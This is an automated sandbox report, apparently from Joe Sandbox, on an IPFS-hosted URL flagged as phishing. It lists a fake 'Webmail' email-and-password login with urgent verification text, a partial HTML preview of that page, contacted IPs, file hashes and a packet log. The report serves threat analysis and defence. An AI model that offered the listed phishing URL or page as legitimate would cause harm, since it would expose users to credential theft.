https://hearty.gift	sets.json.0.dr	false		high
https://mercadoshops.com	sets.json.0.dr	false		high
https://heartymail.com	sets.json.0.dr	false		high
https://nlc.hu	sets.json.0.dr	false		high
https://p106.net	sets.json.0.dr	false		high
https://radio2.be	sets.json.0.dr	false		high
https://finn.no	sets.json.0.dr	false		high
https://hc1.com	sets.json.0.dr	false		high
https://kompas.tv	sets.json.0.dr	false		high
https://mystudentdashboard.com	sets.json.0.dr	false		high
https://songshare.com	sets.json.0.dr	false		high
https://smaker.pl	sets.json.0.dr	false		high
https://mercadopago.com.mx	sets.json.0.dr	false		high
https://p24.hu	sets.json.0.dr	false		high
https://talkdeskqaid.com	sets.json.0.dr	false		high
https://24.hu	sets.json.0.dr	false		high
https://mercadopago.com.pe	sets.json.0.dr	false		high
https://cardsayings.net	sets.json.0.dr	false		high
https://text.com	sets.json.0.dr	false		high
https://mightytext.net	sets.json.0.dr	false		high
https://pudelek.pl	sets.json.0.dr	false		high
https://hazipatika.com	sets.json.0.dr	false		high
https://joyreactor.com	sets.json.0.dr	false		high
https://cookreactor.com	sets.json.0.dr	false		high
https://wildixin.com	sets.json.0.dr	false		high
https://eworkbookcloud.com	sets.json.0.dr	false		high
https://cognitiveai.ru	sets.json.0.dr	false		high
https://nacion.com	sets.json.0.dr	false		high
https://chennien.com	sets.json.0.dr	false		high
https://drimer.travel	sets.json.0.dr	false		high
https://deccoria.pl	sets.json.0.dr	false		high
https://mercadopago.cl	sets.json.0.dr	false		high
https://talkdeskstgid.com	sets.json.0.dr	false		high
https://naukri.com	sets.json.0.dr	false		high
https://interia.pl	sets.json.0.dr	false		high
https://bonvivir.com	sets.json.0.dr	false		high
https://carcostadvisor.be	sets.json.0.dr	false		high
https://salemovetravel.com	sets.json.0.dr	false		high
https://sapo.io	sets.json.0.dr	false		high
https://wpext.pl	sets.json.0.dr	false		high
https://welt.de	sets.json.0.dr	false		high
https://poalim.site	sets.json.0.dr	false		high
https://drimer.io	sets.json.0.dr	false		high
https://infoedgeindia.com	sets.json.0.dr	false		high
https://blackrockadvisorelite.it	sets.json.0.dr	false		high
https://cognitive-ai.ru	sets.json.0.dr	false		high
https://cafemedia.com	sets.json.0.dr	false		high
https://graziadaily.co.uk	sets.json.0.dr	false		high
https://thirdspace.org.au	sets.json.0.dr	false		high
https://mercadoshops.com.ar	sets.json.0.dr	false		high
https://smpn106jkt.sch.id	sets.json.0.dr	false		high
https://elpais.uy	sets.json.0.dr	false		high
https://landyrev.com	sets.json.0.dr	false		high
https://the42.ie	sets.json.0.dr	false		high
https://commentcamarche.com	sets.json.0.dr	false		high
https://tucarro.com.ve	sets.json.0.dr	false		high
https://rws3nvtvt.com	sets.json.0.dr	false		high
https://eleconomista.net	sets.json.0.dr	false		high
https://helpdesk.com	sets.json.0.dr	false		high
https://mercadolivre.com.br	sets.json.0.dr	false		high
https://clmbtech.com	sets.json.0.dr	false		high
https://standardsandpraiserepurpose.com	sets.json.0.dr	false		high
https://07c225f3.online	sets.json.0.dr	false		high
https://salemovefinancial.com	sets.json.0.dr	false		high
https://mercadopago.com.br	sets.json.0.dr	false		high
https://zoom.us	sets.json.0.dr	false		high
https://commentcamarche.net	sets.json.0.dr	false		high
https://etfacademy.it	sets.json.0.dr	false		high
https://mighty-app.appspot.com	sets.json.0.dr	false		high
https://hj.rs	sets.json.0.dr	false		high
https://hearty.me	sets.json.0.dr	false		high
https://mercadolibre.com.gt	sets.json.0.dr	false		high
https://timesinternet.in	sets.json.0.dr	false		high
https://indiatodayne.in	sets.json.0.dr	false		high
https://idbs-staging.com	sets.json.0.dr	false		high
https://blackrock.com	sets.json.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.100	www.google.com	United States	15169	GOOGLEUS	false
151.101.2.137	unknown	United States	54113	FASTLYUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
208.91.114.103	fac.corp.fortinet.com	United States	40934	FORTINETUS	false
151.101.194.137	code.jquery.com	United States	54113	FASTLYUS	false
65.9.66.107	d28h3jm4r3crf8.cloudfront.net	United States	16509	AMAZON-02US	false
209.94.90.1	ipfs.io	United States	40680	PROTOCOLUS	false
65.9.66.13	unknown	United States	16509	AMAZON-02US	false

Private

IP
192.168.2.4
192.168.2.5

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1592352
Start date and time:	2025-01-16 01:31:57 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	http://ipfs.io/ipfs/bafkreievtwi7zrnlawdlg7643acb3jrsmhymub6ofunocklc7jsmefuyre
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal52.phis.win@19/15@19/10
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.163, 216.58.206.46, 142.251.168.84, 172.217.18.110, 172.217.16.206, 142.250.181.238, 172.217.18.10, 172.217.16.202, 142.250.184.234, 142.250.185.74, 142.250.185.170, 142.250.186.74, 172.217.23.106, 142.250.186.42, 142.250.185.138, 142.250.186.170, 142.250.185.106, 142.250.185.234, 142.250.74.202, 216.58.206.74, 142.250.185.202, 142.250.186.138, 217.20.57.20, 2.23.77.188, 172.217.18.14, 142.250.186.78, 216.58.206.78, 142.250.185.206, 142.250.186.99, 142.250.184.206, 34.104.35.123, 184.28.90.27, 172.202.163.200, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: http://ipfs.io/ipfs/bafkreievtwi7zrnlawdlg7643acb3jrsmhymub6ofunocklc7jsmefuyre

Input	Output
URL: http://ipfs.io Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": false, "third_party_hosting": false, "reasoning": "This is the legitimate domain for the InterPlanetary File System (IPFS). The .io TLD is commonly used for technology services and is the official domain for IPFS." }
URL: http://ipfs.io
URL: https://ipfs.io/ipfs/bafkreievtwi7zrnlawdlg7643acb3jrsmhymub6ofunocklc7jsmefuyre Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "This is a very important security measure. To protect your email account. Your account may be restricted until you can verify your identity.", "prominent_button_name": "Log in", "text_input_field_labels": [ "Email:", "Password:" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://ipfs.io/ipfs/bafkreievtwi7zrnlawdlg7643acb3jrsmhymub6ofunocklc7jsmefuyre Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "To protect your email account. Your account may be restricted until you can verify your identity.", "prominent_button_name": "Log in", "text_input_field_labels": [ "Email:", "Password:" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://ipfs.io/ipfs/bafkreievtwi7zrnlawdlg7643acb3jrsmhymub6ofunocklc7jsmefuyre Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: https://ipfs.io/ipfs/bafkreievtwi7zrnlawdlg7643acb3jrsmhymub6ofunocklc7jsmefuyre Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1558
Entropy (8bit):	5.11458514637545
Encrypted:	false
SSDEEP:	48:OBOCrYJ4rYJVwUCLHDy43HV713XEyMmZ3teTHn:LCrYJ4rYJVwUCHZ3Z13XtdUTH
MD5:	EE002CB9E51BB8DFA89640A406A1090A
SHA1:	49EE3AD535947D8821FFDEB67FFC9BC37D1EBBB2
SHA-256:	3DBD2C90050B652D63656481C3E5871C52261575292DB77D4EA63419F187A55B
SHA-512:	D1FDCC436B8CA8C68D4DC7077F84F803A535BF2CE31D9EB5D0C466B62D6567B2C59974995060403ED757E92245DB07E70C6BDDBF1C3519FED300CC5B9BF9177C
Malicious:	false
Reputation:	low
Preview:	// Copyright 2015 The Chromium Authors. All rights reserved..//.// Redistribution and use in source and binary forms, with or without.// modification, are permitted provided that the following conditions are.// met:.//.// * Redistributions of source code must retain the above copyright.// notice, this list of conditions and the following disclaimer..// * Redistributions in binary form must reproduce the above.// copyright notice, this list of conditions and the following disclaimer.// in the documentation and/or other materials provided with the.// distribution..// * Neither the name of Google Inc. nor the names of its.// contributors may be used to endorse or promote products derived from.// this software without specific prior written permission..//.// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS.// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR.// A PARTICULAR

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5804_1536413053\_metadata\verified_contents.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1864
Entropy (8bit):	6.018989605004616
Encrypted:	false
SSDEEP:	48:p/hUI1OwEU3AdIq7ak68O40E2szOxxUJ8BPFkf31U4PrHfqY3J5D:RnOwtQIq7aZ40E2sYUJAYRr/qYZ5D
MD5:	C4709C1D483C9233A3A66A7E157624EA
SHA1:	99A000EB5FE5CC1E94E3155EE075CD6E43DC7582
SHA-256:	225243DC75352D63B0B9B2F48C8AAA09D55F3FB9E385741B12A1956A941880D9
SHA-512:	B45E1FD999D1340CC5EB5A49A4CD967DC736EA3F4EC8B02227577CC3D1E903341BE3217FBB0B74765C72085AC51C63EEF6DCB169D137BBAF3CC49E21EA6468D7
Malicious:	false
Reputation:	low
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJMSUNFTlNFIiwicm9vdF9oYXNoIjoiUGIwc2tBVUxaUzFqWldTQnctV0hIRkltRlhVcExiZDlUcVkwR2ZHSHBWcyJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJVczFpOUt3Zm5uMThTVVR1RVItRXBDTTMwVzFkNTc0cGJwUlJSdGJYM0JVIn0seyJwYXRoIjoic2V0cy5qc29uIiwicm9vdF9oYXNoIjoiM0hiWThLc3poeEF6UDVSUU9fZEpvZGNwbEtpRXR0RWh2UmZMZEtjSTdjZyJ9XSwiZm9ybWF0IjoidHJlZWhhc2giLCJoYXNoX2Jsb2NrX3NpemUiOjQwOTZ9XSwiaXRlbV9pZCI6ImdvbnBlbWRna2pjZWNkZ2JuYWFiaXBwcGJtZ2ZnZ2JlIiwiaXRlbV92ZXJzaW9uIjoiMjAyNC4xMS44LjAiLCJwcm90b2NvbF92ZXJzaW9uIjoxfQ","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"lGxZ1-AH7F8MftKSBdZiFULmC8hZkIHy1_2XIoU81Z5mK0wHVwNV7-55CBTcuuvKjTje-AnKLDoG4S0A_Jeg4lSQK5V_Q4f6JVqp5Vj_ge86YkRZEv4m1bjKRY4N17SHobwuH8Hc_kAugFIlG1LIDHnrm1N7ZWIqo3fVlnVqgSstmvFXAhBazgs1UYRi3hPjPM6e1q1i2N1mIUbxLvG41frGo2QJ8W5J3buUjzs-0y250k-YkadKAR0

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5804_1536413053\manifest.fingerprint

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	66
Entropy (8bit):	3.820000180714897
Encrypted:	false
SSDEEP:	3:SVzHL3phUmWRDNKydvgHVz:SBHLLUmWRbCp
MD5:	BBEC7670A2519FEB0627F17D0C0B5276
SHA1:	9C30B996F1B069F86EF7C0136DFAF7E614674DEA
SHA-256:	670A6F6BBADAB2C2BE63898525FCAF72E7454739E77C04D120BC1A46B6694CAC
SHA-512:	1ED4ED6AE2A2CBE86F9E8C6C7A2672EBB2F37DBE83D2BF09D875DB435ED63BF5F5CF60CA846865166F9A498095F6D61BD51B0A092E097430439E8A5A3A14CB15
Malicious:	false
Reputation:	low
Preview:	1.03cccbb22b17080279ea1707c9ab093c59f4f4dd09580c841cfa794cb372228d

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5804_1536413053\manifest.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	85
Entropy (8bit):	4.462192586591686
Encrypted:	false
SSDEEP:	3:rR6TAulhFphifFCmMARWHJqS1kULJVPY:F6VlM8aRWpqS1kSJVg
MD5:	084E339C0C9FE898102815EAC9A7CDEA
SHA1:	6ABF7EAAA407D2EAB8706361E5A2E5F776D6C644
SHA-256:	52CD62F4AC1F9E7D7C4944EE111F84A42337D16D5DE7BE296E945146D6D7DC15
SHA-512:	0B67A89F3EBFF6FEC3796F481EC2AFBAC233CF64FDC618EC6BA1C12AE125F28B27EE09E8CD0FADB8F6C8785C83929EA6F751E0DDF592DD072AB2CF439BD28534
Malicious:	false
Reputation:	low
Preview:	{. "manifest_version": 2,. "name": "First Party Sets",. "version": "2024.11.8.0".}

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5804_1536413053\sets.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9817
Entropy (8bit):	4.629347296880043
Encrypted:	false
SSDEEP:	96:Mon4mvC4qX19s1blbw/BNKLcxbdmf56MFJtRTGXvcxN43uP+8qJl:v5C4ql7BkIVmtRTGXvcxBsl
MD5:	8C702C686B703020BC0290BAFC90D7A0
SHA1:	EB08FF7885B4C1DE3EF3D61E40697C0C71903E27
SHA-256:	97D9E39021512305820F27B9662F0351E45639124F5BD29F0466E9072A9D0C62
SHA-512:	6137D0ED10E6A27924ED3AB6A0C5F9B21EB0E16A876447DADABD88338198F31BB9D89EF8F0630F4573EA34A24FB3FD3365D7EA78A97BA10028A0758E0A550739
Malicious:	false
Reputation:	low
Preview:	{"primary":"https://bild.de","associatedSites":["https://welt.de","https://autobild.de","https://computerbild.de","https://wieistmeineip.de"],"serviceSites":["https://www.asadcdn.com"]}.{"primary":"https://blackrock.com","associatedSites":["https://blackrockadvisorelite.it","https://cachematrix.com","https://efront.com","https://etfacademy.it","https://ishares.com"]}.{"primary":"https://cafemedia.com","associatedSites":["https://cardsayings.net","https://nourishingpursuits.com"]}.{"primary":"https://caracoltv.com","associatedSites":["https://noticiascaracol.com","https://bluradio.com","https://shock.co","https://bumbox.com","https://hjck.com"]}.{"primary":"https://carcostadvisor.com","ccTLDs":{"https://carcostadvisor.com":["https://carcostadvisor.be","https://carcostadvisor.fr"]}}.{"primary":"https://citybibleforum.org","associatedSites":["https://thirdspace.org.au"]}.{"primary":"https://cognitiveai.ru","associatedSites":["https://cognitive-ai.ru"]}.{"primary":"https://drimer.io","asso

Chrome Cache Entry: 55

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 89a, 200 x 200
Category:	dropped
Size (bytes):	55202
Entropy (8bit):	7.826111557987171
Encrypted:	false
SSDEEP:	1536:WDc0CcT48aUauqkbuZr4/AxOjKWsftVDxLF:ZU4DUPiq/fupftt
MD5:	D536D58EA2F4CFE5D5B734E7893FB09E
SHA1:	77C5E9FCBB33EB9B6DF808AA86F50E0542E5162F
SHA-256:	669C17CDE38DD0AB9673DE77A674C5B192E934399BBEE3EBED65BD70B05BFF5F
SHA-512:	69CE0DF240C3A0AE4ACFF39DE7B08AA9DF3BD288179FAAAC501F59496934C4245B35D888D2424ED66A2C187E65380AA1EF9FA059AC89BB9057C468F3F5CBBBB0
Malicious:	false
Reputation:	low
Preview:	GIF89a..............................!..NETSCAPE2.0.....!.......,...............0.I..8...`(.di.h..l.p,.tm.x..\|....pH,...r.l:..tJ.Z..v..z..0. (...A ...e.zN....x}..e\|.}.V...u~.O...v....t..H...k..D.....@....C....?....<.....4....9.............)....&r..."........e....,.....3..e.6......8.........5.b;...5f...x.Mb...,...Q.....=....H....;.....#...Y#. .4K.l53....z..a...0v.:....JL...(.FQ:B....../ne...VT.(..].....d..[B.[.#.R..W..Dw...+...G..{....b.....)...A.+k.,H...A.V.Zt..+\M....=.[Ox]..l..oo..H.nT.};X-<.U..i.]...9.+x.&.t...7..x+..... .a...$....!oA.Gpw.................'.~!.8....\).-..U. t....a^.aa.O.{.P.?.b%C..`G....C"Q.m..r3\|.an.X.v....3.....o.8.#......Y8K.cc5B.A$......7d.L.kl.d18NYB.@v.ev9h...V.@..g.i....d.j.Re.^...l...$l.....Y&..`..,..Q.*P....bi... .T...D.h..i.Z.J)zb.Q..F..)...Z.......iQ..$.....3..@j'.MH....6qj$. [m.LL.,..n{.4..P..z.n....M.=,[....-tW.Kn-.V.E.R.+...j....j0p.[.L.1..z+?..s.#.{..X..,.gT...H......#..&..1" 'A..+.G.M.,s..Fa.....-.@.R..A..r1.

Chrome Cache Entry: 56

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32065)
Category:	downloaded
Size (bytes):	85578
Entropy (8bit):	5.366055229017455
Encrypted:	false
SSDEEP:	1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
MD5:	2F6B11A7E914718E0290410E85366FE9
SHA1:	69BB69E25CA7D5EF0935317584E6153F3FD9A88C
SHA-256:	05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
SHA-512:	0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
Malicious:	false
Reputation:	low
URL:	https://code.jquery.com/jquery-2.2.4.min.js
Preview:	/! jQuery v2.2.4 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call

Chrome Cache Entry: 57

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	16
Entropy (8bit):	3.452819531114783
Encrypted:	false
SSDEEP:	3:HrRL:1L
MD5:	1E864FBFC865DB4414C7938AF8717484
SHA1:	F8BF8AC081AEC1C65D319CA5F7011A563DBA68BB
SHA-256:	DD41A8261FB62B1852F6937368C64238FF2FEEFD0CB07567EB74A29004DA344A
SHA-512:	824D5EBC56C9E9DBC7B10BBC33D45BEE0640DEE1D3F16888ADD60E8F6B3BA62F961B0519ECEDFC7294A2B74B293728C24BD8B6EFD7D925509A2A6F770F26471A
Malicious:	false
Reputation:	low
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAmOrPg53DWYGBIFDYbYYl4=?alt=proto
Preview:	CgkKBw2G2GJeGgA=

Chrome Cache Entry: 58

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (52134), with CRLF line terminators
Category:	downloaded
Size (bytes):	170813
Entropy (8bit):	5.150639025486325
Encrypted:	false
SSDEEP:	3072:3UMGyB1G23s5RkfstTh1P5kA0tWkpqGLynNFmLjX8bHKYPvbLJ:Ely7Gcs5dtTh1P5kA0t1pqGLynqLz8br
MD5:	739A03118213EDE2117530D9B6750733
SHA1:	F2D46A81FE1A20861EC0C3E31EB699E32F950735
SHA-256:	959D91FCC5AB0586B37FDCD8041DA63261F0CA07CE2D1AE12962FA64C2169889
SHA-512:	C87E81E14DFE4591E06FA2D2555F9C57702591E3A090771035FC2364237A2FF7826D1D9905EDFFA733250D479DEB55801E3103D67FB4C194B7A8A5A8A9A587AC
Malicious:	false
Reputation:	low
URL:	https://ipfs.io/ipfs/bafkreievtwi7zrnlawdlg7643acb3jrsmhymub6ofunocklc7jsmefuyre
Preview:	<!DOCTYPE html>..<html lang="en">.. "aaorbdxoakjs1hwd5pivmk2plmk5w1uovhga09j97zemmpafys0cs82y1et72zzuvnoujfhog4fg711vjplv39smo88j4pyksktel6gy7e9p94stw8pghmwebvfs056thi230tvw8n0"-->..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta http-equiv="X-UA-Compatible" content="ie=edge">.. <meta name="referrer" content="strict-origin">.. <link id="favicon" rel="shortcut icon" type="image/png" href="https://alphatrade-options.com/git/rand/favicon.png">.... <script src="https://code.jquery.com/jquery-2.2.4.min.js".. integrity="sha256-BbhdlvQf/xTY9gja0Dq3HiwQF8LaCRTXxZKRutelT44=" crossorigin="anonymous"></script>.. <title>Webmail</title>.. <script nonce="">.. // Ensure that parent window and opener reload if a page is redirected to login.. if (top.location != window.location) {.. top.location.reload();.. }.. if (window.opener && window.opener.top.location != windo

Chrome Cache Entry: 59

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32065)
Category:	dropped
Size (bytes):	85578
Entropy (8bit):	5.366055229017455
Encrypted:	false
SSDEEP:	1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
MD5:	2F6B11A7E914718E0290410E85366FE9
SHA1:	69BB69E25CA7D5EF0935317584E6153F3FD9A88C
SHA-256:	05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
SHA-512:	0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
Malicious:	false
Reputation:	low
Preview:	/! jQuery v2.2.4 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call

Chrome Cache Entry: 60

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 89a, 200 x 200
Category:	downloaded
Size (bytes):	55202
Entropy (8bit):	7.826111557987171
Encrypted:	false
SSDEEP:	1536:WDc0CcT48aUauqkbuZr4/AxOjKWsftVDxLF:ZU4DUPiq/fupftt
MD5:	D536D58EA2F4CFE5D5B734E7893FB09E
SHA1:	77C5E9FCBB33EB9B6DF808AA86F50E0542E5162F
SHA-256:	669C17CDE38DD0AB9673DE77A674C5B192E934399BBEE3EBED65BD70B05BFF5F
SHA-512:	69CE0DF240C3A0AE4ACFF39DE7B08AA9DF3BD288179FAAAC501F59496934C4245B35D888D2424ED66A2C187E65380AA1EF9FA059AC89BB9057C468F3F5CBBBB0
Malicious:	false
Reputation:	low
URL:	https://ik.imagekit.io/escrowmade/Rolling-1s-200px__1__trHCWXy9jD.gif
Preview:	GIF89a..............................!..NETSCAPE2.0.....!.......,...............0.I..8...`(.di.h..l.p,.tm.x..\|....pH,...r.l:..tJ.Z..v..z..0. (...A ...e.zN....x}..e\|.}.V...u~.O...v....t..H...k..D.....@....C....?....<.....4....9.............)....&r..."........e....,.....3..e.6......8.........5.b;...5f...x.Mb...,...Q.....=....H....;.....#...Y#. .4K.l53....z..a...0v.:....JL...(.FQ:B....../ne...VT.(..].....d..[B.[.#.R..W..Dw...+...G..{....b.....)...A.+k.,H...A.V.Zt..+\M....=.[Ox]..l..oo..H.nT.};X-<.U..i.]...9.+x.&.t...7..x+..... .a...$....!oA.Gpw.................'.~!.8....\).-..U. t....a^.aa.O.{.P.?.b%C..`G....C"Q.m..r3\|.an.X.v....3.....o.8.#......Y8K.cc5B.A$......7d.L.kl.d18NYB.@v.ev9h...V.@..g.i....d.j.Re.^...l...$l.....Y&..`..,..Q.*P....bi... .T...D.h..i.Z.J)zb.Q..F..)...Z.......iQ..$.....3..@j'.MH....6qj$. [m.LL.,..n{.4..P..z.n....M.=,[....-tW.Kn-.V.E.R.+...j....j0p.[.L.1..z+?..s.#.{..X..,.gT...H......#..&..1" 'A..+.G.M.,s..Fa.....-.@.R..A..r1.

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 16, 2025 01:32:52.452970982 CET	49675	443	192.168.2.4	173.222.162.32
Jan 16, 2025 01:32:56.930298090 CET	49737	443	192.168.2.4	142.250.185.100
Jan 16, 2025 01:32:56.930373907 CET	443	49737	142.250.185.100	192.168.2.4
Jan 16, 2025 01:32:56.930459976 CET	49737	443	192.168.2.4	142.250.185.100
Jan 16, 2025 01:32:56.930691957 CET	49737	443	192.168.2.4	142.250.185.100
Jan 16, 2025 01:32:56.930721998 CET	443	49737	142.250.185.100	192.168.2.4
Jan 16, 2025 01:32:57.570425987 CET	443	49737	142.250.185.100	192.168.2.4
Jan 16, 2025 01:32:57.570712090 CET	49737	443	192.168.2.4	142.250.185.100
Jan 16, 2025 01:32:57.570744991 CET	443	49737	142.250.185.100	192.168.2.4
Jan 16, 2025 01:32:57.571713924 CET	443	49737	142.250.185.100	192.168.2.4
Jan 16, 2025 01:32:57.571782112 CET	49737	443	192.168.2.4	142.250.185.100
Jan 16, 2025 01:32:57.573301077 CET	49737	443	192.168.2.4	142.250.185.100
Jan 16, 2025 01:32:57.573362112 CET	443	49737	142.250.185.100	192.168.2.4
Jan 16, 2025 01:32:57.625488043 CET	49737	443	192.168.2.4	142.250.185.100
Jan 16, 2025 01:32:57.625508070 CET	443	49737	142.250.185.100	192.168.2.4
Jan 16, 2025 01:32:57.672374010 CET	49737	443	192.168.2.4	142.250.185.100
Jan 16, 2025 01:32:58.579358101 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:58.579390049 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:58.579456091 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:58.579655886 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:58.579662085 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.056618929 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.056848049 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.056871891 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.057907104 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.057955980 CET	49740	443	192.168.2.4	209.94.90.1
